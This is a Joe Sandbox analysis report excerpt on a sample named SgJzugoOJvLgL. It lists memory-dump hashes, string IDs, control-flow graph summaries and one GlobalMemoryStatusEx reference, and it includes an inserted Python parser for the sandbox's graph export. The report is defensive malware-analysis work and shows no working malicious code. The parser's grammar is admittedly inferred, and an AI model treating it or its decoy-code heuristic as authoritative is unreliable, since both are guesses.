                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1717776256.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_5680000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8dadfb75f25169889797cc339688123dbd4873d003eea519c800285221cf26e3
                                                                              • Instruction ID: 9d75d2be5c04bbc77578670badc63e2595c3a1b2f1af4ae6e90ad2a00af89452
                                                                              • Opcode Fuzzy Hash: 8dadfb75f25169889797cc339688123dbd4873d003eea519c800285221cf26e3
                                                                              • Instruction Fuzzy Hash: 4AE01274D1520CDFCB40EFB8E9457ACBBF4FB48201F1046A9D80993740EA705E80DB92
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1717776256.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_5680000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d34c07b01568d961cd1a7bf79352a85e65492ad0a8b0aacc6c046266d7a72c90
                                                                              • Instruction ID: 8a5265bbb964cf7896148e07d9f9b1fe425d1fb4823cc709616ca7a5706b23e5
                                                                              • Opcode Fuzzy Hash: d34c07b01568d961cd1a7bf79352a85e65492ad0a8b0aacc6c046266d7a72c90
                                                                              • Instruction Fuzzy Hash: 01B09236A87108EACA14AAD8B01D0FCF728E7DA233B026977D20AD2110863589698664
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Execution Graph

                                                                              Execution Coverage:11.2%
                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                              Signature Coverage:0%
                                                                              Total number of Nodes:51
                                                                              Total number of Limit Nodes:7

                                                                              Control-flow Graph

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4108737608.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_6670000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                              • API String ID: 0-2392861976
                                                                              • Opcode ID: 917092c74ff87c48163903842b1ec8209179e9dbc990bf8ba7c5e56e3f73e6d0
                                                                              • Instruction ID: f63762040ce910ff85e2c4974f654af3fb12c01f0277c3aa8c46d9482f80edaf
                                                                              • Opcode Fuzzy Hash: 917092c74ff87c48163903842b1ec8209179e9dbc990bf8ba7c5e56e3f73e6d0
                                                                              • Instruction Fuzzy Hash: A4322E31E1061ACBCB54EF75C95459DB7B6BFC9300F2486A9D409AB354EF30E985CB81
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4108737608.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_6670000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q
                                                                              • API String ID: 0-355816377
                                                                              • Opcode ID: e8559eacbcabf36f08762059c9530ca3b3006ce31b76692260aa3d92784a1ed3
                                                                              • Instruction ID: b32bd1c11980c41335f47d5fad87bd2d743799c37b10acc3919cd9ff523b5919
                                                                              • Opcode Fuzzy Hash: e8559eacbcabf36f08762059c9530ca3b3006ce31b76692260aa3d92784a1ed3
                                                                              • Instruction Fuzzy Hash: B9029E30B0020A8FDB54DB78D594AAEB7E2EF84314F148579D40ADB395DB71EC86CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4108737608.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_6670000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 58b28aac7aa9708ebc2b1f453c7608dcbb81dd4c023d92e390813cbf9fd8f880
                                                                              • Instruction ID: feddaa80265dffc1f56fa6faeacdfb25fd0846ba71a9c9fa64fbd92961476a35
                                                                              • Opcode Fuzzy Hash: 58b28aac7aa9708ebc2b1f453c7608dcbb81dd4c023d92e390813cbf9fd8f880
                                                                              • Instruction Fuzzy Hash: 56924434E00204CFDB64DB68C594A6DBBF6FB88314F5484AAD449AB365DB35EE85CF80
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4108737608.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_6670000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9fbd97bfa271a38f1aa24e04474e8e56dade07a215050e033586b6f667c6f250
                                                                              • Instruction ID: d8e70745b5e7ab1945890e213a64c8334c0cb1a761d601f243cc5b3ed2a1a253
                                                                              • Opcode Fuzzy Hash: 9fbd97bfa271a38f1aa24e04474e8e56dade07a215050e033586b6f667c6f250
                                                                              • Instruction Fuzzy Hash: 6D22E135F002159FDF64DB64C4906AEBBB2EF89310F2484AAD40AEB354DB31EC46CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4108737608.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_6670000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c89e882b0b6f67ed648d0cbc0f682d139ed133d73352272dc2799045c6882a78
                                                                              • Instruction ID: d00124d41e247c106d82452cc8e0e9b2b024aa06a1d17e369deaefabb5e73f18
                                                                              • Opcode Fuzzy Hash: c89e882b0b6f67ed648d0cbc0f682d139ed133d73352272dc2799045c6882a78
                                                                              • Instruction Fuzzy Hash: D722A434F101098FEF64CF6DD5807AEB7B6EB89310F248526E419EB395DA35DC818B92
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4108737608.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_6670000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                              • API String ID: 0-3823777903
                                                                              • Opcode ID: 485f89d80f9836f184bc9cf3d83423b0ba332d7d8c4899a4e9d292586deee9dc
                                                                              • Instruction ID: 9496bff4517914b53e005ea7404efd2d9cc0b3fb8b34a954b226f898ff282785
                                                                              • Opcode Fuzzy Hash: 485f89d80f9836f184bc9cf3d83423b0ba332d7d8c4899a4e9d292586deee9dc
                                                                              • Instruction Fuzzy Hash: 51E17F30E1020A8FDF69DFA8D9946AEB7B2EF85304F108929D409EB355DB35DC46CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

Control-flow Graph

Control-flow graph listing (node/edge export) for the function at 0x0667B660: basic blocks span 0x0667B660 to 0x0667BCE0; 0x06676598 is called from the blocks at 0x0667B75D and 0x0667BAEA.
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4108737608.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_6670000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                              • API String ID: 0-2392861976
                                                                              • Opcode ID: 848a1b78c6ee5057365bf30795aa14185b6140aebe9d9c72a030eb5ad33b6a39
                                                                              • Instruction ID: fc9f4a698766210ef10e90545d635ef4f5ef343ea530ed0489c821fb8a2cc614
                                                                              • Opcode Fuzzy Hash: 848a1b78c6ee5057365bf30795aa14185b6140aebe9d9c72a030eb5ad33b6a39
                                                                              • Instruction Fuzzy Hash: 6F029C30E002098FDFA4CF68D5846ADB7B2FB85314F24896AE419DB355DB31EC86CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

Control-flow Graph

Control-flow graph listing (node/edge export) for the function at 0x06679160: basic blocks span 0x06679160 to 0x06679A8D; no call sites or API references are recorded in the listing.
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4108737608.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_6670000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q$$^q$$^q
                                                                              • API String ID: 0-2125118731
                                                                              • Opcode ID: b23f5ed6c5702fbe5edb02c701026953126b9b338c40bd3e7533c2468bef0cc3
                                                                              • Instruction ID: 714490cf93a61b0f78b1e858051b6bae7b2e8d7805b34e7211c6f40452e75175
                                                                              • Opcode Fuzzy Hash: b23f5ed6c5702fbe5edb02c701026953126b9b338c40bd3e7533c2468bef0cc3
                                                                              • Instruction Fuzzy Hash: 54914D30F1020A9FDBA4DB65D9507AEB7F6AF89344F108569C409EB784EB70DC468B91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

Control-flow Graph

Control-flow graph listing (node/edge export) for the function at 0x0667CF48: basic blocks span 0x0667CF48 to 0x0667DAA8; call sites at 0x0667D9A5 (target 0x0667DABD) and in the blocks at 0x0667D39C, 0x0667D8AB and 0x0667DA2D (target 0x06676598).
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4108737608.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_6670000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q$$^q
                                                                              • API String ID: 0-831282457
                                                                              • Opcode ID: aa4ab04493a46ae4782a9cf0abbf5c4ad2fe7185f688a1c4473fcab583245021
                                                                              • Instruction ID: ec925250f5244a77eb88d07bf25738c312893f29d6c96a643049109cda5ab1e0
                                                                              • Opcode Fuzzy Hash: aa4ab04493a46ae4782a9cf0abbf5c4ad2fe7185f688a1c4473fcab583245021
                                                                              • Instruction Fuzzy Hash: D9625034A002058FCB55EB68D690A5EB7F2FF84304F208969D019DF769DB75ED8ACB81
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

Control-flow Graph

Control-flow graph listing (node/edge export) for the function at 0x06674B70: basic blocks span 0x06674B70 to 0x066752BB; 0x06675418 is called from the block at 0x06674CC1.
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4108737608.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_6670000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: fcq$XPcq$\Ocq
                                                                              • API String ID: 0-3575482020
                                                                              • Opcode ID: a6c8f5a2622b54b204fa6f31cea0d3d8d421ce6e4c25e5f6af45adf45c8a8428
                                                                              • Instruction ID: 07dbc5ca3c8885d6e51294adfcc41a2e11d5941f8293b8e3c0373dc3f206ea7d
                                                                              • Opcode Fuzzy Hash: a6c8f5a2622b54b204fa6f31cea0d3d8d421ce6e4c25e5f6af45adf45c8a8428
                                                                              • Instruction Fuzzy Hash: 34615134F002189FEB559FA8C8587AEBBF6FB88700F208469D106EB395DF758C458B55
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

Control-flow Graph

Control-flow graph listing (node/edge export) for the function at 0x06679151: basic blocks span 0x06679151 to 0x06679A8D, with the same block structure as the listing for 0x06679160 above; no call sites or API references are recorded.
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4108737608.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_6670000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q
                                                                              • API String ID: 0-355816377
                                                                              • Opcode ID: 671ace8248748084773f4547b06ba2acd15f8053f10d64150b4d7a2f13ce5424
                                                                              • Instruction ID: 5fa9a0091626721943636aa03863e6ef843e2e5ba355a0adc60236506b54c323
                                                                              • Opcode Fuzzy Hash: 671ace8248748084773f4547b06ba2acd15f8053f10d64150b4d7a2f13ce5424
                                                                              • Instruction Fuzzy Hash: 9C517230B1010A9FDBA4DB74D990BAEB7FAABC8754F148569C409EB784DA70DC42CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

Control-flow Graph

Control-flow graph listing (node/edge export) for the function at 0x06674B60: basic blocks span 0x06674B60 to 0x066752BB, with the same block structure as the listing for 0x06674B70 above; 0x06675418 is called from the block at 0x06674CC1.
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4108737608.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_6670000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: fcq$XPcq
                                                                              • API String ID: 0-936005338
                                                                              • Opcode ID: d0301fbed561c50042a517f0e620b853d9df89956d0ebaaef0313764a56f27fb
                                                                              • Instruction ID: 73c77d6d944fa4fa8785d79984e6eb046cf8254bb3cb18130f86d21ded3f8ec1
                                                                              • Opcode Fuzzy Hash: d0301fbed561c50042a517f0e620b853d9df89956d0ebaaef0313764a56f27fb
                                                                              • Instruction Fuzzy Hash: 79516E34F002189FDB559FA9C854BAEBBF7EB88700F20842AD146EB395DB758C058F91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

Control-flow Graph

Control-flow graph listing (node/edge export) for the function at 0x0294EB39: basic blocks span 0x0294EB39 to 0x0294ECC5; the call site at 0x0294EB95 is listed twice, once with target 0x0294EC20 and once with target 0x0294EB39 (the function's own entry); GlobalMemoryStatusEx is referenced from the block at 0x0294EC07.
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4097310468.0000000002940000.00000040.00000800.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_2940000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4891fff102712858d4f6f18b376b37715f6698b9a21b14f69f26cfd8e8474f4c
                                                                              • Instruction ID: 522066f0b82f2d1a743bea7708f9e847f4a8dd0b32a7a5dc2d4ad39d294bc488
                                                                              • Opcode Fuzzy Hash: 4891fff102712858d4f6f18b376b37715f6698b9a21b14f69f26cfd8e8474f4c
                                                                              • Instruction Fuzzy Hash: D9412272D003999FCB14DFBAD8046DEBFF5AF89210F1485AAD508A7241EB749885CBE1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%
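The control-flow listings in this report are Joe Sandbox's plain-text node/edge export of each function's graph. The parser below is an added example, not code from the report or from Joe Sandbox: the grammar it implements is inferred from the listings on this page and is an assumption, as are the helper names (parse_cfg, summarize, blocks_calling, unreachable). Its sample input is the listing of the function at 0x0294EB39, copied from this report, so the summary it produces can be checked against the APIs entry for GlobalMemoryStatusEx.

```python
"""Parse the control_flow_graph edge-list text that Joe Sandbox emits for each
disassembled function (the long single-line listings in this report).

Grammar inferred from the listings on this page, not from documentation
(assumption):

    control_flow_graph (NODE | EDGE)*
    NODE := <decimal id> <hex start>[-<hex end>] (call <hex target> | <API name>)*
    EDGE := <decimal id>-><decimal id>
"""
import re
from collections import deque
from dataclasses import dataclass, field

_ADDR = re.compile(r"^[0-9a-f]{5,16}(?:-[0-9a-f]{5,16})?$")
_EDGE = re.compile(r"^(\d+)->(\d+)$")
_ID = re.compile(r"^\d+$")


@dataclass
class Block:
    node: int
    start: int
    end: int                                   # address of the block's last instruction
    calls: list = field(default_factory=list)  # resolved call targets (int)
    apis: list = field(default_factory=list)   # API names attributed to the block


@dataclass
class Cfg:
    blocks: dict   # node id -> Block, in listing order (first one is the entry block)
    edges: list    # (src node id, dst node id)


def parse_cfg(text: str) -> Cfg:
    toks = text.split()
    if not toks or toks[0] != "control_flow_graph":
        raise ValueError("not a control_flow_graph listing")
    blocks, edges, cur = {}, [], None
    i = 1
    while i < len(toks):
        t = toks[i]
        m = _EDGE.match(t)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
        elif _ID.match(t) and i + 1 < len(toks) and _ADDR.match(toks[i + 1]):
            lo, _, hi = toks[i + 1].partition("-")
            cur = Block(int(t), int(lo, 16), int(hi or lo, 16))
            # the same address can appear under two node ids when the export
            # offers alternative call targets for one call site; keep both
            blocks[cur.node] = cur
            i += 2
        elif t == "call" and cur is not None and i + 1 < len(toks):
            cur.calls.append(int(toks[i + 1], 16))
            i += 2
        elif cur is not None:
            cur.apis.append(t)       # any other bare token is an API name
            i += 1
        else:
            raise ValueError(f"unexpected token {t!r} at position {i}")
    return Cfg(blocks, edges)


def _covers(cfg: Cfg, addr: int) -> bool:
    return any(b.start <= addr <= b.end for b in cfg.blocks.values())


def unreachable(cfg: Cfg) -> list:
    """Node ids not reachable from the entry block (dead code or decoy blocks)."""
    succ = {}
    for s, d in cfg.edges:
        succ.setdefault(s, []).append(d)
    entry = next(iter(cfg.blocks))
    seen, todo = {entry}, deque([entry])
    while todo:
        for d in succ.get(todo.popleft(), []):
            if d not in seen:
                seen.add(d)
                todo.append(d)
    return sorted(n for n in cfg.blocks if n not in seen)


def blocks_calling(cfg: Cfg, api: str) -> list:
    """Start addresses of the blocks in which the named API is referenced."""
    return [b.start for b in cfg.blocks.values() if api in b.apis]


def summarize(cfg: Cfg) -> dict:
    blocks = list(cfg.blocks.values())
    callees = sorted({c for b in blocks for c in b.calls})
    srcs = {s for s, _ in cfg.edges}
    return {
        "entry": blocks[0].start,
        "range": (min(b.start for b in blocks), max(b.end for b in blocks)),
        # a target inside the function's own blocks is recursion or a jump into its body
        "internal_callees": [c for c in callees if _covers(cfg, c)],
        "external_callees": [c for c in callees if not _covers(cfg, c)],
        "apis": sorted({a for b in blocks for a in b.apis}),
        "exits": sorted(b.node for b in blocks if b.node not in srcs),  # no successors
        "unreachable": unreachable(cfg),
    }


# Listing copied from this report: the function at 0x0294EB39 in the 0x02940000 dump.
SAMPLE = (
    "control_flow_graph 1877 294eb39-294eb53 1878 294eb55-294eb7c 1877->1878 "
    "1879 294eb7d-294eb93 1877->1879 1900 294eb95 call 294ec20 1879->1900 "
    "1901 294eb95 call 294eb39 1879->1901 1882 294eb9a-294eb9c 1883 294eba2-294ec01 "
    "1882->1883 1884 294eb9e-294eba1 1882->1884 1891 294ec07-294ec94 "
    "GlobalMemoryStatusEx 1883->1891 1892 294ec03-294ec06 1883->1892 "
    "1896 294ec96-294ec9c 1891->1896 1897 294ec9d-294ecc5 1891->1897 1896->1897 "
    "1900->1882 1901->1882"
)

if __name__ == "__main__":
    cfg = parse_cfg(SAMPLE)
    for key, value in summarize(cfg).items():
        print(key, value)
    print("GlobalMemoryStatusEx blocks:", [hex(a) for a in blocks_calling(cfg, "GlobalMemoryStatusEx")])
```

The export lists the call site at 0x0294EB95 twice with two different targets; the parser keeps both as separate nodes rather than guessing which one the disassembler considers correct. blocks_calling gives the block address to break on when replaying the sample under a debugger, and unreachable flags blocks with no path from the entry, which in packed .NET loaders of this kind is a cheap first check for junk or decoy code.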

                                                                              APIs
                                                                              • GlobalMemoryStatusEx.KERNELBASE ref: 0294EC87
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4097310468.0000000002940000.00000040.00000800.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_2940000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID: GlobalMemoryStatus
                                                                              • String ID:
                                                                              • API String ID: 1890195054-0
                                                                              • Opcode ID: 817e34f78ac2f5890edd9bd90a6a5c40291673d0c5b32f33a0868f402cfa8bf0
                                                                              • Instruction ID: ea1e266a1986fcc5ca04f029cfb84d6170381ad43cad00c83463d516907d62a6
                                                                              • Opcode Fuzzy Hash: 817e34f78ac2f5890edd9bd90a6a5c40291673d0c5b32f33a0868f402cfa8bf0
                                                                              • Instruction Fuzzy Hash: 3311EFB1C0066A9BCB10DF9AC544BDEFBF4BB48324F14816AD858A7250D778AA44CFA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4108737608.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_6670000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: PH^q
                                                                              • API String ID: 0-2549759414
                                                                              • Opcode ID: c894c6d3c1e9d7e2f21dc379a2cb3b27da5e9729130512c9b6933aa833552a3d
                                                                              • Instruction ID: 28d7c0dc5fbf85bb20ce472fde56f87b48901b57d30dab5fce28f89b08175435
                                                                              • Opcode Fuzzy Hash: c894c6d3c1e9d7e2f21dc379a2cb3b27da5e9729130512c9b6933aa833552a3d
                                                                              • Instruction Fuzzy Hash: D441D170E003099FDB55DFA9C99469EBBB2FF85700F204829D405EB380EB75E946CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4108737608.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_6670000_SgJzugoOJvLgL.jbxd
                                                                              • Opcode Fuzzy Hash: 15acae3d1646700de8238c3d11afde401929a7d2f94ea3ac2c521bd9654d53d9
                                                                              • Instruction Fuzzy Hash: FF219875F102199FDB50DFA9D980AAEBBF1EB8C610F10802AE905E7380E734ED418B91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4096591002.000000000287D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0287D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_287d000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1143019bee28057d7f3a12df28169f3c4f8bdc5c55b54cd97dffedd71a67de73
                                                                              • Instruction ID: 5209a21daf094c166b780068e77911a6290551f739b80a6ee59ea373083b0143
                                                                              • Opcode Fuzzy Hash: 1143019bee28057d7f3a12df28169f3c4f8bdc5c55b54cd97dffedd71a67de73
                                                                              • Instruction Fuzzy Hash: 0B21047D504204DFDB14DF14D9C4B26BBA5FF84318F24C56DD84A8B256C33AD447CA62
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4096591002.000000000287D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0287D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_287d000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0588b49294be620d3eca39d369528ee3b25a02582e5bfec040e0a45b9fb5bbb8
                                                                              • Instruction ID: b6be9ac9675c8ffe1e1289975624579eccb8b59cd13fcefe19678fa695998962
                                                                              • Opcode Fuzzy Hash: 0588b49294be620d3eca39d369528ee3b25a02582e5bfec040e0a45b9fb5bbb8
                                                                              • Instruction Fuzzy Hash: 44212B7550D3C09FCB039B24D994711BF71AF46214F29C5DBD8898F2A7C33A985ACB62
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4108737608.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_6670000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8ff14d1990b9da6af7d0239c0670b54cab0fd0738e3f915e4bbaaab2b54a93ed
                                                                              • Instruction ID: 5a3a44c9979521c97a9934b7df6ffd15c9581abd7b58dcc3f7b5519988901190
                                                                              • Opcode Fuzzy Hash: 8ff14d1990b9da6af7d0239c0670b54cab0fd0738e3f915e4bbaaab2b54a93ed
                                                                              • Instruction Fuzzy Hash: 52118E32B101289FDF58A678D814AAE73FAABC8251F00453AD40AEB344DE75DC028BD2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4108737608.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_6670000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: dd20d4171b722165dc6dce0e8057782694dd29619e4c2b727b991af3f22fd0ac
                                                                              • Instruction ID: 0518a0dee13b5a71f95f4ad4b86a596f1b79093f9441fc98e498a52ec0c711a6
                                                                              • Opcode Fuzzy Hash: dd20d4171b722165dc6dce0e8057782694dd29619e4c2b727b991af3f22fd0ac
                                                                              • Instruction Fuzzy Hash: EB01BC30B041100FDB6586ADD85876BABEBEBCA710F14843BE10ACB791DE65DC574792
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4108737608.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_6670000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8dfab72adca46680b4509efa055099110da3eaafc60c13b6ec7ab066e4b15ec0
                                                                              • Instruction ID: 397fa781b99d3250c8d343fb2ecd2b7036561ce0eacf9128ff87b38a344468e2
                                                                              • Opcode Fuzzy Hash: 8dfab72adca46680b4509efa055099110da3eaafc60c13b6ec7ab066e4b15ec0
                                                                              • Instruction Fuzzy Hash: 0A01F735B101105FCB61DABDEA60B6FB7DAEB8A724F04443AF10ECB381DA65DD068391
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4108737608.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_6670000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 699e64dcde7dd57f2e3c595594d82e9ea4944fe50a26f36d5ab02e829327fe06
                                                                              • Instruction ID: 0dd5fa52bc293173e43140d521b6ff5732d0d3ab180beb532ca8e3c4b14f613c
                                                                              • Opcode Fuzzy Hash: 699e64dcde7dd57f2e3c595594d82e9ea4944fe50a26f36d5ab02e829327fe06
                                                                              • Instruction Fuzzy Hash: 6701B130B041504FDB65D67CE864B7EB7E6EBCA710F148469E44ACB382DA21DC178786
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4108737608.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_6670000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 801c1aeedc8c2e9a7fbc02b97c456d469cf8b6ccef5b24993b0978e4ef50b810
                                                                              • Instruction ID: cda531f16aaf32de86a8f8a920eb8401e13ad5f0c09363f1f3d87acf69ecef2e
